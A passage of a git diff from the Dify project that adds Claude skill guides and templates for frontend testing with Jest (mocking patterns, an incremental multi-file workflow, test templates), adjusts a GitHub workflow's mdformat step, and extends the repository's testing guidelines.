+ }) +}) +``` + +### 3. Portal Components (with Shared State) + +```typescript +// ⚠️ Important: Use shared state for components that depend on each other +let mockPortalOpenState = false + +jest.mock('@/app/components/base/portal-to-follow-elem', () => ({ + PortalToFollowElem: ({ children, open, ...props }: any) => { + mockPortalOpenState = open || false // Update shared state + return
{children}
+ }, + PortalToFollowElemContent: ({ children }: any) => { + // ✅ Matches actual: returns null when portal is closed + if (!mockPortalOpenState) return null + return
{children}
+ }, + PortalToFollowElemTrigger: ({ children }: any) => ( +
{children}
+ ), +})) + +describe('Component', () => { + beforeEach(() => { + jest.clearAllMocks() + mockPortalOpenState = false // ✅ Reset shared state + }) +}) +``` + +### 4. API Service Mocks + +```typescript +import * as api from '@/service/api' + +jest.mock('@/service/api') + +const mockedApi = api as jest.Mocked + +describe('Component', () => { + beforeEach(() => { + jest.clearAllMocks() + + // Setup default mock implementation + mockedApi.fetchData.mockResolvedValue({ data: [] }) + }) + + it('should show data on success', async () => { + mockedApi.fetchData.mockResolvedValue({ data: [{ id: 1 }] }) + + render() + + await waitFor(() => { + expect(screen.getByText('1')).toBeInTheDocument() + }) + }) + + it('should show error on failure', async () => { + mockedApi.fetchData.mockRejectedValue(new Error('Network error')) + + render() + + await waitFor(() => { + expect(screen.getByText(/error/i)).toBeInTheDocument() + }) + }) +}) +``` + +### 5. HTTP Mocking with Nock + +```typescript +import nock from 'nock' + +const GITHUB_HOST = 'https://api.github.com' +const GITHUB_PATH = '/repos/owner/repo' + +const mockGithubApi = (status: number, body: Record, delayMs = 0) => { + return nock(GITHUB_HOST) + .get(GITHUB_PATH) + .delay(delayMs) + .reply(status, body) +} + +describe('GithubComponent', () => { + afterEach(() => { + nock.cleanAll() + }) + + it('should display repo info', async () => { + mockGithubApi(200, { name: 'dify', stars: 1000 }) + + render() + + await waitFor(() => { + expect(screen.getByText('dify')).toBeInTheDocument() + }) + }) + + it('should handle API error', async () => { + mockGithubApi(500, { message: 'Server error' }) + + render() + + await waitFor(() => { + expect(screen.getByText(/error/i)).toBeInTheDocument() + }) + }) +}) +``` + +### 6. Context Providers + +```typescript +import { ProviderContext } from '@/context/provider-context' +import { createMockProviderContextValue, createMockPlan } from '@/__mocks__/provider-context' + +describe('Component with Context', () => { + it('should render for free plan', () => { + const mockContext = createMockPlan('sandbox') + + render( + + + + ) + + expect(screen.getByText('Upgrade')).toBeInTheDocument() + }) + + it('should render for pro plan', () => { + const mockContext = createMockPlan('professional') + + render( + + + + ) + + expect(screen.queryByText('Upgrade')).not.toBeInTheDocument() + }) +}) +``` + +### 7. SWR / React Query + +```typescript +// SWR +jest.mock('swr', () => ({ + __esModule: true, + default: jest.fn(), +})) + +import useSWR from 'swr' +const mockedUseSWR = useSWR as jest.Mock + +describe('Component with SWR', () => { + it('should show loading state', () => { + mockedUseSWR.mockReturnValue({ + data: undefined, + error: undefined, + isLoading: true, + }) + + render() + expect(screen.getByText(/loading/i)).toBeInTheDocument() + }) +}) + +// React Query +import { QueryClient, QueryClientProvider } from '@tanstack/react-query' + +const createTestQueryClient = () => new QueryClient({ + defaultOptions: { + queries: { retry: false }, + mutations: { retry: false }, + }, +}) + +const renderWithQueryClient = (ui: React.ReactElement) => { + const queryClient = createTestQueryClient() + return render( + + {ui} + + ) +} +``` + +## Mock Best Practices + +### ✅ DO + +1. **Use real base components** - Import from `@/app/components/base/` directly +1. **Use real project components** - Prefer importing over mocking +1. **Reset mocks in `beforeEach`**, not `afterEach` +1. **Match actual component behavior** in mocks (when mocking is necessary) +1. **Use factory functions** for complex mock data +1. **Import actual types** for type safety +1. **Reset shared mock state** in `beforeEach` + +### ❌ DON'T + +1. **Don't mock base components** (`Loading`, `Button`, `Tooltip`, etc.) +1. Don't mock components you can import directly +1. Don't create overly simplified mocks that miss conditional logic +1. Don't forget to clean up nock after each test +1. Don't use `any` types in mocks without necessity + +### Mock Decision Tree + +``` +Need to use a component in test? +│ +├─ Is it from @/app/components/base/*? +│ └─ YES → Import real component, DO NOT mock +│ +├─ Is it a project component? +│ └─ YES → Prefer importing real component +│ Only mock if setup is extremely complex +│ +├─ Is it an API service (@/service/*)? +│ └─ YES → Mock it +│ +├─ Is it a third-party lib with side effects? +│ └─ YES → Mock it (next/navigation, external SDKs) +│ +└─ Is it i18n? + └─ YES → Mock to return keys +``` + +## Factory Function Pattern + +```typescript +// __mocks__/data-factories.ts +import type { User, Project } from '@/types' + +export const createMockUser = (overrides: Partial = {}): User => ({ + id: 'user-1', + name: 'Test User', + email: 'test@example.com', + role: 'member', + createdAt: new Date().toISOString(), + ...overrides, +}) + +export const createMockProject = (overrides: Partial = {}): Project => ({ + id: 'project-1', + name: 'Test Project', + description: 'A test project', + owner: createMockUser(), + members: [], + createdAt: new Date().toISOString(), + ...overrides, +}) + +// Usage in tests +it('should display project owner', () => { + const project = createMockProject({ + owner: createMockUser({ name: 'John Doe' }), + }) + + render() + expect(screen.getByText('John Doe')).toBeInTheDocument() +}) +``` diff --git a/.claude/skills/frontend-testing/guides/workflow.md b/.claude/skills/frontend-testing/guides/workflow.md new file mode 100644 index 0000000000..b0f2994bde --- /dev/null +++ b/.claude/skills/frontend-testing/guides/workflow.md @@ -0,0 +1,269 @@ +# Testing Workflow Guide + +This guide defines the workflow for generating tests, especially for complex components or directories with multiple files. + +## Scope Clarification + +This guide addresses **multi-file workflow** (how to process multiple test files). For coverage requirements within a single test file, see `web/testing/testing.md` § Coverage Goals. + +| Scope | Rule | +|-------|------| +| **Single file** | Complete coverage in one generation (100% function, >95% branch) | +| **Multi-file directory** | Process one file at a time, verify each before proceeding | + +## ⚠️ Critical Rule: Incremental Approach for Multi-File Testing + +When testing a **directory with multiple files**, **NEVER generate all test files at once.** Use an incremental, verify-as-you-go approach. + +### Why Incremental? + +| Batch Approach (❌) | Incremental Approach (✅) | +|---------------------|---------------------------| +| Generate 5+ tests at once | Generate 1 test at a time | +| Run tests only at the end | Run test immediately after each file | +| Multiple failures compound | Single point of failure, easy to debug | +| Hard to identify root cause | Clear cause-effect relationship | +| Mock issues affect many files | Mock issues caught early | +| Messy git history | Clean, atomic commits possible | + +## Single File Workflow + +When testing a **single component, hook, or utility**: + +``` +1. Read source code completely +2. Run `pnpm analyze-component ` (if available) +3. Check complexity score and features detected +4. Write the test file +5. Run test: `pnpm test -- .spec.tsx` +6. Fix any failures +7. Verify coverage meets goals (100% function, >95% branch) +``` + +## Directory/Multi-File Workflow (MUST FOLLOW) + +When testing a **directory or multiple files**, follow this strict workflow: + +### Step 1: Analyze and Plan + +1. **List all files** that need tests in the directory +1. **Categorize by complexity**: + - 🟢 **Simple**: Utility functions, simple hooks, presentational components + - 🟡 **Medium**: Components with state, effects, or event handlers + - 🔴 **Complex**: Components with API calls, routing, or many dependencies +1. **Order by dependency**: Test dependencies before dependents +1. **Create a todo list** to track progress + +### Step 2: Determine Processing Order + +Process files in this recommended order: + +``` +1. Utility functions (simplest, no React) +2. Custom hooks (isolated logic) +3. Simple presentational components (few/no props) +4. Medium complexity components (state, effects) +5. Complex components (API, routing, many deps) +6. Container/index components (integration tests - last) +``` + +**Rationale**: + +- Simpler files help establish mock patterns +- Hooks used by components should be tested first +- Integration tests (index files) depend on child components working + +### Step 3: Process Each File Incrementally + +**For EACH file in the ordered list:** + +``` +┌─────────────────────────────────────────────┐ +│ 1. Write test file │ +│ 2. Run: pnpm test -- .spec.tsx │ +│ 3. If FAIL → Fix immediately, re-run │ +│ 4. If PASS → Mark complete in todo list │ +│ 5. ONLY THEN proceed to next file │ +└─────────────────────────────────────────────┘ +``` + +**DO NOT proceed to the next file until the current one passes.** + +### Step 4: Final Verification + +After all individual tests pass: + +```bash +# Run all tests in the directory together +pnpm test -- path/to/directory/ + +# Check coverage +pnpm test -- --coverage path/to/directory/ +``` + +## Component Complexity Guidelines + +Use `pnpm analyze-component ` to assess complexity before testing. + +### 🔴 Very Complex Components (Complexity > 50) + +**Consider refactoring BEFORE testing:** + +- Break component into smaller, testable pieces +- Extract complex logic into custom hooks +- Separate container and presentational layers + +**If testing as-is:** + +- Use integration tests for complex workflows +- Use `test.each()` for data-driven testing +- Multiple `describe` blocks for organization +- Consider testing major sections separately + +### 🟡 Medium Complexity (Complexity 30-50) + +- Group related tests in `describe` blocks +- Test integration scenarios between internal parts +- Focus on state transitions and side effects +- Use helper functions to reduce test complexity + +### 🟢 Simple Components (Complexity < 30) + +- Standard test structure +- Focus on props, rendering, and edge cases +- Usually straightforward to test + +### 📏 Large Files (500+ lines) + +Regardless of complexity score: + +- **Strongly consider refactoring** before testing +- If testing as-is, test major sections separately +- Create helper functions for test setup +- May need multiple test files + +## Todo List Format + +When testing multiple files, use a todo list like this: + +``` +Testing: path/to/directory/ + +Ordered by complexity (simple → complex): + +☐ utils/helper.ts [utility, simple] +☐ hooks/use-custom-hook.ts [hook, simple] +☐ empty-state.tsx [component, simple] +☐ item-card.tsx [component, medium] +☐ list.tsx [component, complex] +☐ index.tsx [integration] + +Progress: 0/6 complete +``` + +Update status as you complete each: + +- ☐ → ⏳ (in progress) +- ⏳ → ✅ (complete and verified) +- ⏳ → ❌ (blocked, needs attention) + +## When to Stop and Verify + +**Always run tests after:** + +- Completing a test file +- Making changes to fix a failure +- Modifying shared mocks +- Updating test utilities or helpers + +**Signs you should pause:** + +- More than 2 consecutive test failures +- Mock-related errors appearing +- Unclear why a test is failing +- Test passing but coverage unexpectedly low + +## Common Pitfalls to Avoid + +### ❌ Don't: Generate Everything First + +``` +# BAD: Writing all files then testing +Write component-a.spec.tsx +Write component-b.spec.tsx +Write component-c.spec.tsx +Write component-d.spec.tsx +Run pnpm test ← Multiple failures, hard to debug +``` + +### ✅ Do: Verify Each Step + +``` +# GOOD: Incremental with verification +Write component-a.spec.tsx +Run pnpm test -- component-a.spec.tsx ✅ +Write component-b.spec.tsx +Run pnpm test -- component-b.spec.tsx ✅ +...continue... +``` + +### ❌ Don't: Skip Verification for "Simple" Components + +Even simple components can have: + +- Import errors +- Missing mock setup +- Incorrect assumptions about props + +**Always verify, regardless of perceived simplicity.** + +### ❌ Don't: Continue When Tests Fail + +Failing tests compound: + +- A mock issue in file A affects files B, C, D +- Fixing A later requires revisiting all dependent tests +- Time wasted on debugging cascading failures + +**Fix failures immediately before proceeding.** + +## Integration with Claude's Todo Feature + +When using Claude for multi-file testing: + +1. **Ask Claude to create a todo list** before starting +1. **Request one file at a time** or ensure Claude processes incrementally +1. **Verify each test passes** before asking for the next +1. **Mark todos complete** as you progress + +Example prompt: + +``` +Test all components in `path/to/directory/`. +First, analyze the directory and create a todo list ordered by complexity. +Then, process ONE file at a time, waiting for my confirmation that tests pass +before proceeding to the next. +``` + +## Summary Checklist + +Before starting multi-file testing: + +- [ ] Listed all files needing tests +- [ ] Ordered by complexity (simple → complex) +- [ ] Created todo list for tracking +- [ ] Understand dependencies between files + +During testing: + +- [ ] Processing ONE file at a time +- [ ] Running tests after EACH file +- [ ] Fixing failures BEFORE proceeding +- [ ] Updating todo list progress + +After completion: + +- [ ] All individual tests pass +- [ ] Full directory test run passes +- [ ] Coverage goals met +- [ ] Todo list shows all complete diff --git a/.claude/skills/frontend-testing/templates/component-test.template.tsx b/.claude/skills/frontend-testing/templates/component-test.template.tsx new file mode 100644 index 0000000000..9b1542b676 --- /dev/null +++ b/.claude/skills/frontend-testing/templates/component-test.template.tsx @@ -0,0 +1,289 @@ +/** + * Test Template for React Components + * + * WHY THIS STRUCTURE? + * - Organized sections make tests easy to navigate and maintain + * - Mocks at top ensure consistent test isolation + * - Factory functions reduce duplication and improve readability + * - describe blocks group related scenarios for better debugging + * + * INSTRUCTIONS: + * 1. Replace `ComponentName` with your component name + * 2. Update import path + * 3. Add/remove test sections based on component features (use analyze-component) + * 4. Follow AAA pattern: Arrange → Act → Assert + * + * RUN FIRST: pnpm analyze-component to identify required test scenarios + */ + +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +// import ComponentName from './index' + +// ============================================================================ +// Mocks +// ============================================================================ +// WHY: Mocks must be hoisted to top of file (Jest requirement). +// They run BEFORE imports, so keep them before component imports. + +// i18n (always required in Dify) +// WHY: Returns key instead of translation so tests don't depend on i18n files +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => key, + }), +})) + +// Router (if component uses useRouter, usePathname, useSearchParams) +// WHY: Isolates tests from Next.js routing, enables testing navigation behavior +// const mockPush = jest.fn() +// jest.mock('next/navigation', () => ({ +// useRouter: () => ({ push: mockPush }), +// usePathname: () => '/test-path', +// })) + +// API services (if component fetches data) +// WHY: Prevents real network calls, enables testing all states (loading/success/error) +// jest.mock('@/service/api') +// import * as api from '@/service/api' +// const mockedApi = api as jest.Mocked + +// Shared mock state (for portal/dropdown components) +// WHY: Portal components like PortalToFollowElem need shared state between +// parent and child mocks to correctly simulate open/close behavior +// let mockOpenState = false + +// ============================================================================ +// Test Data Factories +// ============================================================================ +// WHY FACTORIES? +// - Avoid hard-coded test data scattered across tests +// - Easy to create variations with overrides +// - Type-safe when using actual types from source +// - Single source of truth for default test values + +// const createMockProps = (overrides = {}) => ({ +// // Default props that make component render successfully +// ...overrides, +// }) + +// const createMockItem = (overrides = {}) => ({ +// id: 'item-1', +// name: 'Test Item', +// ...overrides, +// }) + +// ============================================================================ +// Test Helpers +// ============================================================================ + +// const renderComponent = (props = {}) => { +// return render() +// } + +// ============================================================================ +// Tests +// ============================================================================ + +describe('ComponentName', () => { + // WHY beforeEach with clearAllMocks? + // - Ensures each test starts with clean slate + // - Prevents mock call history from leaking between tests + // - MUST be beforeEach (not afterEach) to reset BEFORE assertions like toHaveBeenCalledTimes + beforeEach(() => { + jest.clearAllMocks() + // Reset shared mock state if used (CRITICAL for portal/dropdown tests) + // mockOpenState = false + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED - Every component MUST have these) + // -------------------------------------------------------------------------- + // WHY: Catches import errors, missing providers, and basic render issues + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange - Setup data and mocks + // const props = createMockProps() + + // Act - Render the component + // render() + + // Assert - Verify expected output + // Prefer getByRole for accessibility; it's what users "see" + // expect(screen.getByRole('...')).toBeInTheDocument() + }) + + it('should render with default props', () => { + // WHY: Verifies component works without optional props + // render() + // expect(screen.getByText('...')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Props Tests (REQUIRED - Every component MUST test prop behavior) + // -------------------------------------------------------------------------- + // WHY: Props are the component's API contract. Test them thoroughly. + describe('Props', () => { + it('should apply custom className', () => { + // WHY: Common pattern in Dify - components should merge custom classes + // render() + // expect(screen.getByTestId('component')).toHaveClass('custom-class') + }) + + it('should use default values for optional props', () => { + // WHY: Verifies TypeScript defaults work at runtime + // render() + // expect(screen.getByRole('...')).toHaveAttribute('...', 'default-value') + }) + }) + + // -------------------------------------------------------------------------- + // User Interactions (if component has event handlers - on*, handle*) + // -------------------------------------------------------------------------- + // WHY: Event handlers are core functionality. Test from user's perspective. + describe('User Interactions', () => { + it('should call onClick when clicked', async () => { + // WHY userEvent over fireEvent? + // - userEvent simulates real user behavior (focus, hover, then click) + // - fireEvent is lower-level, doesn't trigger all browser events + // const user = userEvent.setup() + // const handleClick = jest.fn() + // render() + // + // await user.click(screen.getByRole('button')) + // + // expect(handleClick).toHaveBeenCalledTimes(1) + }) + + it('should call onChange when value changes', async () => { + // const user = userEvent.setup() + // const handleChange = jest.fn() + // render() + // + // await user.type(screen.getByRole('textbox'), 'new value') + // + // expect(handleChange).toHaveBeenCalled() + }) + }) + + // -------------------------------------------------------------------------- + // State Management (if component uses useState/useReducer) + // -------------------------------------------------------------------------- + // WHY: Test state through observable UI changes, not internal state values + describe('State Management', () => { + it('should update state on interaction', async () => { + // WHY test via UI, not state? + // - State is implementation detail; UI is what users see + // - If UI works correctly, state must be correct + // const user = userEvent.setup() + // render() + // + // // Initial state - verify what user sees + // expect(screen.getByText('Initial')).toBeInTheDocument() + // + // // Trigger state change via user action + // await user.click(screen.getByRole('button')) + // + // // New state - verify UI updated + // expect(screen.getByText('Updated')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Async Operations (if component fetches data - useSWR, useQuery, fetch) + // -------------------------------------------------------------------------- + // WHY: Async operations have 3 states users experience: loading, success, error + describe('Async Operations', () => { + it('should show loading state', () => { + // WHY never-resolving promise? + // - Keeps component in loading state for assertion + // - Alternative: use fake timers + // mockedApi.fetchData.mockImplementation(() => new Promise(() => {})) + // render() + // + // expect(screen.getByText(/loading/i)).toBeInTheDocument() + }) + + it('should show data on success', async () => { + // WHY waitFor? + // - Component updates asynchronously after fetch resolves + // - waitFor retries assertion until it passes or times out + // mockedApi.fetchData.mockResolvedValue({ items: ['Item 1'] }) + // render() + // + // await waitFor(() => { + // expect(screen.getByText('Item 1')).toBeInTheDocument() + // }) + }) + + it('should show error on failure', async () => { + // mockedApi.fetchData.mockRejectedValue(new Error('Network error')) + // render() + // + // await waitFor(() => { + // expect(screen.getByText(/error/i)).toBeInTheDocument() + // }) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED - Every component MUST handle edge cases) + // -------------------------------------------------------------------------- + // WHY: Real-world data is messy. Components must handle: + // - Null/undefined from API failures or optional fields + // - Empty arrays/strings from user clearing data + // - Boundary values (0, MAX_INT, special characters) + describe('Edge Cases', () => { + it('should handle null value', () => { + // WHY test null specifically? + // - API might return null for missing data + // - Prevents "Cannot read property of null" in production + // render() + // expect(screen.getByText(/no data/i)).toBeInTheDocument() + }) + + it('should handle undefined value', () => { + // WHY test undefined separately from null? + // - TypeScript treats them differently + // - Optional props are undefined, not null + // render() + // expect(screen.getByText(/no data/i)).toBeInTheDocument() + }) + + it('should handle empty array', () => { + // WHY: Empty state often needs special UI (e.g., "No items yet") + // render() + // expect(screen.getByText(/empty/i)).toBeInTheDocument() + }) + + it('should handle empty string', () => { + // WHY: Empty strings are truthy in JS but visually empty + // render() + // expect(screen.getByText(/placeholder/i)).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Accessibility (optional but recommended for Dify's enterprise users) + // -------------------------------------------------------------------------- + // WHY: Dify has enterprise customers who may require accessibility compliance + describe('Accessibility', () => { + it('should have accessible name', () => { + // WHY getByRole with name? + // - Tests that screen readers can identify the element + // - Enforces proper labeling practices + // render() + // expect(screen.getByRole('button', { name: /test label/i })).toBeInTheDocument() + }) + + it('should support keyboard navigation', async () => { + // WHY: Some users can't use a mouse + // const user = userEvent.setup() + // render() + // + // await user.tab() + // expect(screen.getByRole('button')).toHaveFocus() + }) + }) +}) diff --git a/.claude/skills/frontend-testing/templates/hook-test.template.ts b/.claude/skills/frontend-testing/templates/hook-test.template.ts new file mode 100644 index 0000000000..4fb7fd21ec --- /dev/null +++ b/.claude/skills/frontend-testing/templates/hook-test.template.ts @@ -0,0 +1,207 @@ +/** + * Test Template for Custom Hooks + * + * Instructions: + * 1. Replace `useHookName` with your hook name + * 2. Update import path + * 3. Add/remove test sections based on hook features + */ + +import { renderHook, act, waitFor } from '@testing-library/react' +// import { useHookName } from './use-hook-name' + +// ============================================================================ +// Mocks +// ============================================================================ + +// API services (if hook fetches data) +// jest.mock('@/service/api') +// import * as api from '@/service/api' +// const mockedApi = api as jest.Mocked + +// ============================================================================ +// Test Helpers +// ============================================================================ + +// Wrapper for hooks that need context +// const createWrapper = (contextValue = {}) => { +// return ({ children }: { children: React.ReactNode }) => ( +// +// {children} +// +// ) +// } + +// ============================================================================ +// Tests +// ============================================================================ + +describe('useHookName', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // -------------------------------------------------------------------------- + // Initial State + // -------------------------------------------------------------------------- + describe('Initial State', () => { + it('should return initial state', () => { + // const { result } = renderHook(() => useHookName()) + // + // expect(result.current.value).toBe(initialValue) + // expect(result.current.isLoading).toBe(false) + }) + + it('should accept initial value from props', () => { + // const { result } = renderHook(() => useHookName({ initialValue: 'custom' })) + // + // expect(result.current.value).toBe('custom') + }) + }) + + // -------------------------------------------------------------------------- + // State Updates + // -------------------------------------------------------------------------- + describe('State Updates', () => { + it('should update value when setValue is called', () => { + // const { result } = renderHook(() => useHookName()) + // + // act(() => { + // result.current.setValue('new value') + // }) + // + // expect(result.current.value).toBe('new value') + }) + + it('should reset to initial value', () => { + // const { result } = renderHook(() => useHookName({ initialValue: 'initial' })) + // + // act(() => { + // result.current.setValue('changed') + // }) + // expect(result.current.value).toBe('changed') + // + // act(() => { + // result.current.reset() + // }) + // expect(result.current.value).toBe('initial') + }) + }) + + // -------------------------------------------------------------------------- + // Async Operations + // -------------------------------------------------------------------------- + describe('Async Operations', () => { + it('should fetch data on mount', async () => { + // mockedApi.fetchData.mockResolvedValue({ data: 'test' }) + // + // const { result } = renderHook(() => useHookName()) + // + // // Initially loading + // expect(result.current.isLoading).toBe(true) + // + // // Wait for data + // await waitFor(() => { + // expect(result.current.isLoading).toBe(false) + // }) + // + // expect(result.current.data).toEqual({ data: 'test' }) + }) + + it('should handle fetch error', async () => { + // mockedApi.fetchData.mockRejectedValue(new Error('Network error')) + // + // const { result } = renderHook(() => useHookName()) + // + // await waitFor(() => { + // expect(result.current.error).toBeTruthy() + // }) + // + // expect(result.current.error?.message).toBe('Network error') + }) + + it('should refetch when dependency changes', async () => { + // mockedApi.fetchData.mockResolvedValue({ data: 'test' }) + // + // const { result, rerender } = renderHook( + // ({ id }) => useHookName(id), + // { initialProps: { id: '1' } } + // ) + // + // await waitFor(() => { + // expect(mockedApi.fetchData).toHaveBeenCalledWith('1') + // }) + // + // rerender({ id: '2' }) + // + // await waitFor(() => { + // expect(mockedApi.fetchData).toHaveBeenCalledWith('2') + // }) + }) + }) + + // -------------------------------------------------------------------------- + // Side Effects + // -------------------------------------------------------------------------- + describe('Side Effects', () => { + it('should call callback when value changes', () => { + // const callback = jest.fn() + // const { result } = renderHook(() => useHookName({ onChange: callback })) + // + // act(() => { + // result.current.setValue('new value') + // }) + // + // expect(callback).toHaveBeenCalledWith('new value') + }) + + it('should cleanup on unmount', () => { + // const cleanup = jest.fn() + // jest.spyOn(window, 'addEventListener') + // jest.spyOn(window, 'removeEventListener') + // + // const { unmount } = renderHook(() => useHookName()) + // + // expect(window.addEventListener).toHaveBeenCalled() + // + // unmount() + // + // expect(window.removeEventListener).toHaveBeenCalled() + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle null input', () => { + // const { result } = renderHook(() => useHookName(null)) + // + // expect(result.current.value).toBeNull() + }) + + it('should handle rapid updates', () => { + // const { result } = renderHook(() => useHookName()) + // + // act(() => { + // result.current.setValue('1') + // result.current.setValue('2') + // result.current.setValue('3') + // }) + // + // expect(result.current.value).toBe('3') + }) + }) + + // -------------------------------------------------------------------------- + // With Context (if hook uses context) + // -------------------------------------------------------------------------- + describe('With Context', () => { + it('should use context value', () => { + // const wrapper = createWrapper({ someValue: 'context-value' }) + // const { result } = renderHook(() => useHookName(), { wrapper }) + // + // expect(result.current.contextValue).toBe('context-value') + }) + }) +}) diff --git a/.claude/skills/frontend-testing/templates/utility-test.template.ts b/.claude/skills/frontend-testing/templates/utility-test.template.ts new file mode 100644 index 0000000000..ec13b5f5bd --- /dev/null +++ b/.claude/skills/frontend-testing/templates/utility-test.template.ts @@ -0,0 +1,154 @@ +/** + * Test Template for Utility Functions + * + * Instructions: + * 1. Replace `utilityFunction` with your function name + * 2. Update import path + * 3. Use test.each for data-driven tests + */ + +// import { utilityFunction } from './utility' + +// ============================================================================ +// Tests +// ============================================================================ + +describe('utilityFunction', () => { + // -------------------------------------------------------------------------- + // Basic Functionality + // -------------------------------------------------------------------------- + describe('Basic Functionality', () => { + it('should return expected result for valid input', () => { + // expect(utilityFunction('input')).toBe('expected-output') + }) + + it('should handle multiple arguments', () => { + // expect(utilityFunction('a', 'b', 'c')).toBe('abc') + }) + }) + + // -------------------------------------------------------------------------- + // Data-Driven Tests + // -------------------------------------------------------------------------- + describe('Input/Output Mapping', () => { + test.each([ + // [input, expected] + ['input1', 'output1'], + ['input2', 'output2'], + ['input3', 'output3'], + ])('should return %s for input %s', (input, expected) => { + // expect(utilityFunction(input)).toBe(expected) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle empty string', () => { + // expect(utilityFunction('')).toBe('') + }) + + it('should handle null', () => { + // expect(utilityFunction(null)).toBe(null) + // or + // expect(() => utilityFunction(null)).toThrow() + }) + + it('should handle undefined', () => { + // expect(utilityFunction(undefined)).toBe(undefined) + // or + // expect(() => utilityFunction(undefined)).toThrow() + }) + + it('should handle empty array', () => { + // expect(utilityFunction([])).toEqual([]) + }) + + it('should handle empty object', () => { + // expect(utilityFunction({})).toEqual({}) + }) + }) + + // -------------------------------------------------------------------------- + // Boundary Conditions + // -------------------------------------------------------------------------- + describe('Boundary Conditions', () => { + it('should handle minimum value', () => { + // expect(utilityFunction(0)).toBe(0) + }) + + it('should handle maximum value', () => { + // expect(utilityFunction(Number.MAX_SAFE_INTEGER)).toBe(...) + }) + + it('should handle negative numbers', () => { + // expect(utilityFunction(-1)).toBe(...) + }) + }) + + // -------------------------------------------------------------------------- + // Type Coercion (if applicable) + // -------------------------------------------------------------------------- + describe('Type Handling', () => { + it('should handle numeric string', () => { + // expect(utilityFunction('123')).toBe(123) + }) + + it('should handle boolean', () => { + // expect(utilityFunction(true)).toBe(...) + }) + }) + + // -------------------------------------------------------------------------- + // Error Cases + // -------------------------------------------------------------------------- + describe('Error Handling', () => { + it('should throw for invalid input', () => { + // expect(() => utilityFunction('invalid')).toThrow('Error message') + }) + + it('should throw with specific error type', () => { + // expect(() => utilityFunction('invalid')).toThrow(ValidationError) + }) + }) + + // -------------------------------------------------------------------------- + // Complex Objects (if applicable) + // -------------------------------------------------------------------------- + describe('Object Handling', () => { + it('should preserve object structure', () => { + // const input = { a: 1, b: 2 } + // expect(utilityFunction(input)).toEqual({ a: 1, b: 2 }) + }) + + it('should handle nested objects', () => { + // const input = { nested: { deep: 'value' } } + // expect(utilityFunction(input)).toEqual({ nested: { deep: 'transformed' } }) + }) + + it('should not mutate input', () => { + // const input = { a: 1 } + // const inputCopy = { ...input } + // utilityFunction(input) + // expect(input).toEqual(inputCopy) + }) + }) + + // -------------------------------------------------------------------------- + // Array Handling (if applicable) + // -------------------------------------------------------------------------- + describe('Array Handling', () => { + it('should process all elements', () => { + // expect(utilityFunction([1, 2, 3])).toEqual([2, 4, 6]) + }) + + it('should handle single element array', () => { + // expect(utilityFunction([1])).toEqual([2]) + }) + + it('should preserve order', () => { + // expect(utilityFunction(['c', 'a', 'b'])).toEqual(['c', 'a', 'b']) + }) + }) +}) diff --git a/.github/workflows/autofix.yml b/.github/workflows/autofix.yml index 81392a9734..3563c29577 100644 --- a/.github/workflows/autofix.yml +++ b/.github/workflows/autofix.yml @@ -61,9 +61,10 @@ jobs: find . -name "*.py" -type f -exec sed -i.bak -E 's/"([^"]+)" \| None/Optional["\1"]/g; s/'"'"'([^'"'"']+)'"'"' \| None/Optional['"'"'\1'"'"']/g' {} \; find . -name "*.py.bak" -type f -delete + # mdformat breaks YAML front matter in markdown files. Add --exclude for directories containing YAML front matter. - name: mdformat run: | - uvx mdformat . + uvx --python 3.13 mdformat . --exclude ".claude/skills/**" - name: Install pnpm uses: pnpm/action-setup@v4 diff --git a/web/testing/testing.md b/web/testing/testing.md index bf1b89af00..a08a615e54 100644 --- a/web/testing/testing.md +++ b/web/testing/testing.md @@ -42,7 +42,7 @@ pnpm test -- path/to/file.spec.tsx ## Test Authoring Principles - **Single behavior per test**: Each test verifies one user-observable behavior. -- **Black-box first**: Assert external behavior and observable outputs, avoid internal implementation details. +- **Black-box first**: Assert external behavior and observable outputs, avoid internal implementation details. Prefer role-based queries (`getByRole`) and pattern matching (`/text/i`) over hardcoded string assertions. - **Semantic naming**: Use `should when ` and group related cases with `describe()`. - **AAA / Given–When–Then**: Separate Arrange, Act, and Assert clearly with code blocks or comments. - **Minimal but sufficient assertions**: Keep only the expectations that express the essence of the behavior. @@ -93,6 +93,7 @@ Use `pnpm analyze-component ` to analyze component complexity and adopt di - Testing time-based behavior (delays, animations) - If you mock all time-dependent functions, fake timers are unnecessary 1. **Prefer importing over mocking project components**: When tests need other components from the project, import them directly instead of mocking them. Only mock external dependencies, APIs, or complex context providers that are difficult to set up. +1. **DO NOT mock base components**: Never mock components from `@/app/components/base/` (e.g., `Loading`, `Button`, `Tooltip`, `Modal`). Base components will have their own dedicated tests. Use real components to test actual integration behavior. **Why this matters**: Mocks that don't match actual behavior can lead to: @@ -101,6 +102,43 @@ Use `pnpm analyze-component ` to analyze component complexity and adopt di - **Maintenance burden**: Tests become misleading documentation - **State leakage**: Tests interfere with each other when shared state isn't reset +## Path-Level Testing Strategy + +When assigned to test a **directory/path** (not just a single file), follow these guidelines: + +### Coverage Scope + +- Test **ALL files** in the assigned directory, not just the entry `index` file +- Include all components, hooks, utilities within the path +- Goal: 100% coverage of the entire directory contents + +### Test Organization + +Choose based on directory complexity: + +1. **Single spec file (Integration approach)** - Preferred for related components + + - Minimize mocking - use real project components + - Test actual integration between components + - Only mock: API calls, complex context providers, third-party libs + +1. **Multiple spec files (Unit approach)** - For complex directories + + - One spec file per component/hook/utility + - More isolated testing + - Useful when components are independent + +### Integration Testing First + +When using a single spec file: + +- ✅ **Import real project components** directly (including base components and siblings) +- ✅ **Only mock**: API services (`@/service/*`), `next/navigation`, complex context providers +- ❌ **DO NOT mock** base components (`@/app/components/base/*`) +- ❌ **DO NOT mock** sibling/child components in the same directory + +> See [Example Structure](#example-structure) for correct import/mock patterns. + ## Testing Components with 